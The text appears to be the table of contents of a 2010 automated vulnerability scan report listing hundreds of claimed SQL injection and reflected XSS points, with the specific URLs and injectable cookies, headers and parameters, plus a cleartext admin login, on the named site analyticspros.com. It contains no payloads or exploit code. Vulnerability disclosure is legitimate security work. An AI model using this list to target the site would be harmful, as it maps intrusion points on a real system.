Manually Confirmed XSS (All) | SQL Injection Audited and Confirmed (Various)

Report generated by Hoyt LLC Research at Sat Nov 06 10:30:36 EDT 2010.


1. SQL injection

1.1. http://www.analyticspros.com/ [ki_t cookie]

1.2. http://www.analyticspros.com/about/ [User-Agent HTTP header]

1.3. http://www.analyticspros.com/administrator/ [Referer HTTP header]

1.4. http://www.analyticspros.com/administrator/templates/khepri/favicon.ico [REST URL parameter 3]

1.5. http://www.analyticspros.com/blog.html [__utmmobile cookie]

1.6. http://www.analyticspros.com/blog.html [apros2.0_tpl cookie]

1.7. http://www.analyticspros.com/blog.html [name of an arbitrarily supplied request parameter]

1.8. http://www.analyticspros.com/blog.html [optimizelyEndUserId cookie]

1.9. http://www.analyticspros.com/blog.html [utm_campaign parameter]

1.10. http://www.analyticspros.com/blog.html [utm_source parameter]

1.11. http://www.analyticspros.com/blog/55-googleanalytics.html [__utma cookie]

1.12. http://www.analyticspros.com/blog/55-googleanalytics.html [__utmc cookie]

1.13. http://www.analyticspros.com/blog/55-googleanalytics/ [apros2.0_tpl cookie]

1.14. http://www.analyticspros.com/blog/55-googleanalytics/ [ki_u cookie]

1.15. http://www.analyticspros.com/blog/55-googleanalytics/ [name of an arbitrarily supplied request parameter]

1.16. http://www.analyticspros.com/blog/55-googleanalytics/ [optimizelyBuckets cookie]

1.17. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [REST URL parameter 1]

1.18. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [User-Agent HTTP header]

1.19. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [__utmb cookie]

1.20. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html [REST URL parameter 2]

1.21. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html [__utmc cookie]

1.22. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html [REST URL parameter 2]

1.23. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html [apros2.0_tpl cookie]

1.24. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html [name of an arbitrarily supplied request parameter]

1.25. http://www.analyticspros.com/blog/55-googleanalytics/113-domain-hostname-content-reports.html [ki_u cookie]

1.26. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html [Referer HTTP header]

1.27. http://www.analyticspros.com/blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html [__utmc cookie]

1.28. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [REST URL parameter 2]

1.29. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [__utmmobile cookie]

1.30. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [optimizelyEndUserId cookie]

1.31. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [__utmb cookie]

1.32. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [__utmz cookie]

1.33. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [itemid parameter]

1.34. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html [__utmmobile cookie]

1.35. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html [ki_t cookie]

1.36. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html [__utma cookie]

1.37. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.38. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html [__utma cookie]

1.39. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html [fpssCookie cookie]

1.40. http://www.analyticspros.com/blog/55-googleanalytics/86-google-analytics-intelligence.html [__utmmobile cookie]

1.41. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.42. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [REST URL parameter 2]

1.43. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [User-Agent HTTP header]

1.44. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [__utmz cookie]

1.45. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [ki_t cookie]

1.46. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utma cookie]

1.47. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utmb cookie]

1.48. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [apros2.0_tpl cookie]

1.49. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.50. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.51. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html [apros2.0_tpl cookie]

1.52. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 3]

1.53. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [name of an arbitrarily supplied request parameter]

1.54. http://www.analyticspros.com/blog/56-seo/59-search-ranking-position-with-ga.html [__utmmobile cookie]

1.55. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.56. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html [__utmz cookie]

1.57. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [REST URL parameter 3]

1.58. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [__utmc cookie]

1.59. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [__utmmobile cookie]

1.60. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [apros2.0_tpl cookie]

1.61. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [ki_u cookie]

1.62. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.63. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html [ki_u cookie]

1.64. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.65. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html [optimizelyEndUserId cookie]

1.66. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [REST URL parameter 1]

1.67. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.68. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]

1.69. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html [__utmz cookie]

1.70. http://www.analyticspros.com/blog/googleanalytics.feed [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.71. http://www.analyticspros.com/blog/googleanalytics.feed [__utmmobile cookie]

1.72. http://www.analyticspros.com/blog/googleanalytics.feed [optimizelyEndUserId cookie]

1.73. http://www.analyticspros.com/blog/googleanalytics.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.74. http://www.analyticspros.com/blog/googleanalytics.html [REST URL parameter 1]

1.75. http://www.analyticspros.com/blog/googleanalytics.html [REST URL parameter 2]

1.76. http://www.analyticspros.com/blog/googleanalytics.html [User-Agent HTTP header]

1.77. http://www.analyticspros.com/blog/googleanalytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.78. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [REST URL parameter 1]

1.79. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [__utmmobile cookie]

1.80. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [optimizelyEndUserId cookie]

1.81. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [7876d45a49f537da76cfb9e129203eee cookie]

1.82. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [Referer HTTP header]

1.83. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [apros2.0_tpl cookie]

1.84. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html [optimizelyBuckets cookie]

1.85. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [REST URL parameter 3]

1.86. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [fpssCookie cookie]

1.87. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [ki_t cookie]

1.88. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [ki_u cookie]

1.89. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html [ki_t cookie]

1.90. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html [ki_t cookie]

1.91. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [REST URL parameter 1]

1.92. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.93. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [ki_t cookie]

1.94. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [ki_t cookie]

1.95. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [name of an arbitrarily supplied request parameter]

1.96. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [REST URL parameter 3]

1.97. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [Referer HTTP header]

1.98. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [optimizelyEndUserId cookie]

1.99. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.100. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html [REST URL parameter 3]

1.101. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.102. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.103. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [__utma cookie]

1.104. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [__utmz cookie]

1.105. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [ki_t cookie]

1.106. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [ki_u cookie]

1.107. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [name of an arbitrarily supplied request parameter]

1.108. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [Referer HTTP header]

1.109. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [__utmc cookie]

1.110. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [__utmmobile cookie]

1.111. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [fpssCookie cookie]

1.112. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [ki_t cookie]

1.113. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [7876d45a49f537da76cfb9e129203eee cookie]

1.114. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [REST URL parameter 3]

1.115. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [__utmz cookie]

1.116. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [apros2.0_tpl cookie]

1.117. http://www.analyticspros.com/blog/googleanalytics/91-google-analytics-cookies-and-domains.html [REST URL parameter 1]

1.118. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [User-Agent HTTP header]

1.119. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utma cookie]

1.120. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utmc cookie]

1.121. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [apros2.0_tpl cookie]

1.122. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [optimizelyEndUserId cookie]

1.123. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utma cookie]

1.124. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utmmobile cookie]

1.125. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utmmobile cookie]

1.126. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [ki_t cookie]

1.127. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [name of an arbitrarily supplied request parameter]

1.128. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 1]

1.129. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 3]

1.130. http://www.analyticspros.com/blog/seo.feed [apros2.0_tpl cookie]

1.131. http://www.analyticspros.com/blog/seo.feed [fpssCookie cookie]

1.132. http://www.analyticspros.com/blog/seo.feed [type parameter]

1.133. http://www.analyticspros.com/blog/seo.html [User-Agent HTTP header]

1.134. http://www.analyticspros.com/blog/seo/ [Referer HTTP header]

1.135. http://www.analyticspros.com/blog/seo/ [apros2.0_tpl cookie]

1.136. http://www.analyticspros.com/blog/seo/ [fpssCookie cookie]

1.137. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html [User-Agent HTTP header]

1.138. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html [optimizelyBuckets cookie]

1.139. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html [ki_u cookie]

1.140. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html [optimizelyBuckets cookie]

1.141. http://www.analyticspros.com/blog/urchin.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.142. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html [ki_t cookie]

1.143. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [REST URL parameter 3]

1.144. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [apros2.0_tpl cookie]

1.145. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [optimizelyBuckets cookie]

1.146. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html [REST URL parameter 2]

1.147. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html [ki_u cookie]

1.148. http://www.analyticspros.com/blog/urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]

1.149. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html [__utma cookie]

1.150. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html [ki_u cookie]

1.151. http://www.analyticspros.com/blog/webanalytics.html [REST URL parameter 2]

1.152. http://www.analyticspros.com/blog/webanalytics.html [apros2.0_tpl cookie]

1.153. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html [__utmmobile cookie]

1.154. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [User-Agent HTTP header]

1.155. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [__utmc cookie]

1.156. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [__utmmobile cookie]

1.157. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html [itemid parameter]

1.158. http://www.analyticspros.com/component/jsetup/comment/ [REST URL parameter 1]

1.159. http://www.analyticspros.com/component/jsetup/comment/ [REST URL parameter 3]

1.160. http://www.analyticspros.com/component/jsetup/comment/ [Referer HTTP header]

1.161. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 2]

1.162. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 4]

1.163. http://www.analyticspros.com/component/jsetup/comment/add.html [User-Agent HTTP header]

1.164. http://www.analyticspros.com/component/jsetup/comment/add.html [__utmc cookie]

1.165. http://www.analyticspros.com/component/jsetup/comment/add.html [__utmc cookie]

1.166. http://www.analyticspros.com/component/jsetup/comment/add.html [apros2.0_tpl cookie]

1.167. http://www.analyticspros.com/component/jsetup/comment/add.html [commenttype parameter]

1.168. http://www.analyticspros.com/component/jsetup/comment/add.html [fpssCookie cookie]

1.169. http://www.analyticspros.com/component/jsetup/comment/add.html [fpssCookie cookie]

1.170. http://www.analyticspros.com/component/jsetup/comment/add.html [ki_t cookie]

1.171. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect [ki_t cookie]

1.172. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect [name of an arbitrarily supplied request parameter]

1.173. http://www.analyticspros.com/components/com_chronocontact/css/images/ [REST URL parameter 2]

1.174. http://www.analyticspros.com/components/com_chronocontact/themes/theme1/ [REST URL parameter 2]

1.175. http://www.analyticspros.com/consulting.html [Referer HTTP header]

1.176. http://www.analyticspros.com/consulting.html [User-Agent HTTP header]

1.177. http://www.analyticspros.com/consulting.html [ki_t cookie]

1.178. http://www.analyticspros.com/consulting.html [ki_u cookie]

1.179. http://www.analyticspros.com/images/stories/blogimg/ [REST URL parameter 1]

1.180. http://www.analyticspros.com/images/stories/products/healtcheck/ [REST URL parameter 2]

1.181. http://www.analyticspros.com/index.php [Itemid parameter]

1.182. http://www.analyticspros.com/index.php [REST URL parameter 1]

1.183. http://www.analyticspros.com/index.php [Referer HTTP header]

1.184. http://www.analyticspros.com/index.php [User-Agent HTTP header]

1.185. http://www.analyticspros.com/index.php [User-Agent HTTP header]

1.186. http://www.analyticspros.com/index.php [__utma cookie]

1.187. http://www.analyticspros.com/index.php [__utmb cookie]

1.188. http://www.analyticspros.com/index.php [__utmc cookie]

1.189. http://www.analyticspros.com/index.php [__utmz cookie]

1.190. http://www.analyticspros.com/index.php [__utmz cookie]

1.191. http://www.analyticspros.com/index.php [apros2.0_tpl cookie]

1.192. http://www.analyticspros.com/index.php [commenttype parameter]

1.193. http://www.analyticspros.com/index.php [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.194. http://www.analyticspros.com/index.php [eid parameter]

1.195. http://www.analyticspros.com/index.php [etid parameter]

1.196. http://www.analyticspros.com/index.php [file_17 parameter]

1.197. http://www.analyticspros.com/index.php [fpssCookie cookie]

1.198. http://www.analyticspros.com/index.php [ki_u cookie]

1.199. http://www.analyticspros.com/index.php [ki_u cookie]

1.200. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]

1.201. http://www.analyticspros.com/index.php [optimizelyBuckets cookie]

1.202. http://www.analyticspros.com/index.php [optimizelyBuckets cookie]

1.203. http://www.analyticspros.com/index.php [optimizelyEndUserId cookie]

1.204. http://www.analyticspros.com/index.php [option parameter]

1.205. http://www.analyticspros.com/index.php [undefined parameter]

1.206. http://www.analyticspros.com/joobi/user/media/images/captcha/ [REST URL parameter 3]

1.207. http://www.analyticspros.com/modules/mod_fpss/includes/elements/categories.php [REST URL parameter 1]

1.208. http://www.analyticspros.com/modules/mod_fpss/includes/elements/categories.php [REST URL parameter 5]

1.209. http://www.analyticspros.com/modules/mod_fpss/includes/elements/header.php [REST URL parameter 5]

1.210. http://www.analyticspros.com/modules/mod_fpss/tmpl/ [REST URL parameter 1]

1.211. http://www.analyticspros.com/plugins/system/pc_includes/JSON.php [REST URL parameter 1]

1.212. http://www.analyticspros.com/products.html [name of an arbitrarily supplied request parameter]

1.213. http://www.analyticspros.com/products/ [User-Agent HTTP header]

1.214. http://www.analyticspros.com/products/ [__utmmobile cookie]

1.215. http://www.analyticspros.com/products/ [ki_t cookie]

1.216. http://www.analyticspros.com/products/63-urchin.html [apros2.0_tpl cookie]

1.217. http://www.analyticspros.com/products/63-urchin/119-urchin-6.html [__utmc cookie]

1.218. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html [User-Agent HTTP header]

1.219. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.220. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html [ki_t cookie]

1.221. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html [optimizelyEndUserId cookie]

1.222. http://www.analyticspros.com/products/63-urchin/70-urchin.html [Referer HTTP header]

1.223. http://www.analyticspros.com/products/63-urchin/70-urchin.html [__utma cookie]

1.224. http://www.analyticspros.com/products/63-urchin/70-urchin.html [ki_t cookie]

1.225. http://www.analyticspros.com/products/63-urchin/70-urchin.html [optimizelyEndUserId cookie]

1.226. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html [ki_t cookie]

1.227. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html [ki_u cookie]

1.228. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html [optimizelyBuckets cookie]

1.229. http://www.analyticspros.com/products/64-data-warehouse/ [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.230. http://www.analyticspros.com/products/65-ae/ [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.231. http://www.analyticspros.com/products/65-ae/110-analytics-engine.html [__utmmobile cookie]

1.232. http://www.analyticspros.com/products/65-ae/function.mysql-connect [apros2.0_tpl cookie]

1.233. http://www.analyticspros.com/resources.html [__utmc cookie]

1.234. http://www.analyticspros.com/resources.html [optimizelyBuckets cookie]

1.235. http://www.analyticspros.com/resources/ [fpssCookie cookie]

1.236. http://www.analyticspros.com/resources/ [ki_t cookie]

1.237. http://www.analyticspros.com/resources/123-dimensionator-install.html [User-Agent HTTP header]

1.238. http://www.analyticspros.com/resources/123-dimensionator-install.html [__utma cookie]

1.239. http://www.analyticspros.com/resources/123-dimensionator-install.html [name of an arbitrarily supplied request parameter]

1.240. http://www.analyticspros.com/resources/64-campaign-tracker.html [optimizelyEndUserId cookie]

1.241. http://www.analyticspros.com/resources/90-analytics-toolbar.html [REST URL parameter 1]

1.242. http://www.analyticspros.com/resources/90-analytics-toolbar.html [__utmz cookie]

1.243. http://www.analyticspros.com/resources/90-analytics-toolbar.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.244. http://www.analyticspros.com/resources/campaign-url-builder.html [REST URL parameter 2]

1.245. http://www.analyticspros.com/resources/campaign-url-builder.html [ki_t cookie]

1.246. http://www.analyticspros.com/resources/campaign-url-builder.html [optimizelyBuckets cookie]

1.247. http://www.analyticspros.com/resources/feeds.html [REST URL parameter 2]

1.248. http://www.analyticspros.com/resources/feeds.html [Referer HTTP header]

1.249. http://www.analyticspros.com/resources/feeds.html [__utmc cookie]

1.250. http://www.analyticspros.com/resources/feeds.html [ki_u cookie]

1.251. http://www.analyticspros.com/resources/feeds.html [optimizelyBuckets cookie]

1.252. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/12-canalytics-blog.html [Referer HTTP header]

1.253. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/12-canalytics-blog.html [__utmmobile cookie]

1.254. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

1.255. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html [__utmz cookie]

1.256. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html [Referer HTTP header]

1.257. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html [__utmz cookie]

1.258. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html [REST URL parameter 3]

1.259. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html [Referer HTTP header]

1.260. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html [ki_t cookie]

1.261. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html [optimizelyEndUserId cookie]

1.262. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/16-vki-studios-blog.html [__utmc cookie]

1.263. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/16-vki-studios-blog.html [ki_u cookie]

1.264. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html [__utmc cookie]

1.265. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html [__utmmobile cookie]

1.266. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html [__utmz cookie]

1.267. http://www.analyticspros.com/resources/feeds/37-ga-support-forums.html [__utmz cookie]

1.268. http://www.analyticspros.com/resources/feeds/37-ga-support-forums.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.269. http://www.analyticspros.com/resources/function.mysql-connect [User-Agent HTTP header]

1.270. http://www.analyticspros.com/resources/function.mysql-connect [__utmb cookie]

1.271. http://www.analyticspros.com/resources/function.mysql-connect [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.272. http://www.analyticspros.com/resources/healthcheck.html [__utmc cookie]

1.273. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [REST URL parameter 1]

1.274. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [REST URL parameter 2]

1.275. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [Referer HTTP header]

1.276. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [name of an arbitrarily supplied request parameter]

1.277. http://www.analyticspros.com/templates/apros2.0/js/ [REST URL parameter 3]

1.278. http://www.analyticspros.com/templates/system/ [REST URL parameter 2]

1.279. http://www.analyticspros.com/training.html [__utma cookie]

1.280. http://www.analyticspros.com/training.html [apros2.0_tpl cookie]

1.281. http://www.analyticspros.com/training.html [ki_t cookie]

1.282. http://www.analyticspros.com/urchin.html [__utmc cookie]

1.283. http://www.analyticspros.com/urchin.html [ki_t cookie]

2. Cross-site scripting (reflected)

2.1. http://www.analyticspros.com/blog.html [name of an arbitrarily supplied request parameter]

2.2. http://www.analyticspros.com/blog/ [name of an arbitrarily supplied request parameter]

2.3. http://www.analyticspros.com/blog/55-googleanalytics.html [name of an arbitrarily supplied request parameter]

2.4. http://www.analyticspros.com/blog/62-urchin.html [name of an arbitrarily supplied request parameter]

2.5. http://www.analyticspros.com/blog/62-urchin/ [name of an arbitrarily supplied request parameter]

2.6. http://www.analyticspros.com/blog/googleanalytics.feed [name of an arbitrarily supplied request parameter]

2.7. http://www.analyticspros.com/blog/googleanalytics.html [name of an arbitrarily supplied request parameter]

2.8. http://www.analyticspros.com/blog/googleanalytics/ [name of an arbitrarily supplied request parameter]

2.9. http://www.analyticspros.com/blog/seo.feed [name of an arbitrarily supplied request parameter]

2.10. http://www.analyticspros.com/blog/seo/ [name of an arbitrarily supplied request parameter]

2.11. http://www.analyticspros.com/blog/urchin.feed [name of an arbitrarily supplied request parameter]

2.12. http://www.analyticspros.com/blog/urchin.html [name of an arbitrarily supplied request parameter]

2.13. http://www.analyticspros.com/blog/urchin/ [name of an arbitrarily supplied request parameter]

2.14. http://www.analyticspros.com/blog/webanalytics.feed [name of an arbitrarily supplied request parameter]

2.15. http://www.analyticspros.com/component/jsetup/comment/add.html [REST URL parameter 4]

2.16. http://www.analyticspros.com/component/jsetup/comment/add.html [name of an arbitrarily supplied request parameter]

2.17. http://www.analyticspros.com/component/jsetup/comment/add.html [titleheader parameter]

2.18. http://www.analyticspros.com/index.php [format parameter]

2.19. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]

2.20. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]

2.21. http://www.analyticspros.com/index.php [titleheader parameter]

2.22. http://www.analyticspros.com/products.html [name of an arbitrarily supplied request parameter]

2.23. http://www.analyticspros.com/products/ [name of an arbitrarily supplied request parameter]

3. Cleartext submission of password

3.1. http://www.analyticspros.com/administrator/

3.2. http://www.analyticspros.com/administrator/index.php

4. Referer-dependent response

4.1. http://www.analyticspros.com/about.html

4.2. http://www.analyticspros.com/blog.html

4.3. http://www.analyticspros.com/blog/55-googleanalytics.html

4.4. http://www.analyticspros.com/blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

4.5. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

4.6. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html

